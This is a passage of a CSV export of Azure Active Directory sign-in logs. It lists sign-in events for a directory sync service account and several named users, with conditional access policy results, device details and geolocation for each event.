'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4aed1172-3ed3-4e97-ac91-018652782100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-018652782100,SigninLogs,Sucess,36.6404686,-78.26995087
+333,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:37.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ecc0277-074a-4eee-93ad-7c73b5137759,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e1e7e006-7b3d-4bd9-87b2-47b43e9e1f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e1e7e006-7b3d-4bd9-87b2-47b43e9e1f00,SigninLogs,Sucess,36.6404686,-78.26995087
+334,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:37.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ecc0277-074a-4eee-93ad-7c73b5137759,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e1e7e006-7b3d-4bd9-87b2-47b43e9e1f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e1e7e006-7b3d-4bd9-87b2-47b43e9e1f00,SigninLogs,Sucess,36.6404686,-78.26995087
+335,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1c10553-1f37-46f4-9a5e-b55eb3c19fb7,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fbdeba2200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0db84f87-d59a-4024-94d6-18fbdeba2200,SigninLogs,Sucess,33.45851135,-82.21336365
+336,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:19.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1e1968e5-b2b5-4bde-9c05-d76a5d370029,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fb2dbb2200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,0db84f87-d59a-4024-94d6-18fb2dbb2200,SigninLogs,Sucess,33.45851135,-82.21336365
+337,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:27.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93d60bd4-ad49-40a5-9c6c-157df9f12100,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d60bd4-ad49-40a5-9c6c-157df9f12100,SigninLogs,Sucess,33.0175209,35.44601059
+338,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:16.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1c10553-1f37-46f4-9a5e-b55eb3c19fb7,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0db84f87-d59a-4024-94d6-18fbdeba2200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -82.21336364746094, 'latitude': 33.45851135253906}, 'state': 'Georgia', 'city': 'Grovetown'}",none,none,none,none,[],{'errorCode': 0},Matt Corby,efe2e9d9-fecc-482a-bd04-d45d5e93f9e4,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,0db84f87-d59a-4024-94d6-18fbdeba2200,SigninLogs,Sucess,33.45851135,-82.21336365
+339,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:18.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4d20c58e-b939-43c6-8cd2-d5532cc58239,Microsoft.aadiam,Microsoft.aadiam,,Matt Corby,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 